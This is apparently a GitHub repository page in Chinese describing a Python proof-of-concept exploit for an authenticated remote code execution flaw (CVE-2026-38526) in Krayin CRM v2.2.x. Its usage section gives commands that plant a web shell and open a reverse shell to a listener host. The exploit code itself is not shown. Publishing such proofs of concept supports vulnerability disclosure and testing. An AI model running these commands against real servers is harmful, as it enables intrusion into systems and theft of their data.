Qurclinc/CVE-2026-38526

GitHub: Qurclinc/CVE-2026-38526

Krayin CRM v2.2.x 认证后远程代码执行漏洞(CVE-2026-38526)的 Python PoC 利用脚本。

Stars: 0 | Forks: 0

# CVE-2026-38526 - Krayin CRM RCE ## 描述 用于 Krayin CRM v2.2.x 中严重漏洞的 PoC 脚本,允许通过不受限制的文件上传进行经过身份验证的 RCE。 ## 用法 ``` # Web shell python3 exploit.py -u http://target.com -e admin@example.com -p password123 # Reverse shell python3 exploit.py -u http://target.com -e admin@example.com -p password123 -l 10.10.10.10 -P 4444 ``` ## 环境要求 - Python 3.8+ - requests, bs4 ## 免责声明 仅供教育目的使用。 ## 参考 - https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38526/poc.md
标签:Python, RCE, Web安全, 安全, 无后门, 蓝队分析, 超时处理, 逆向工具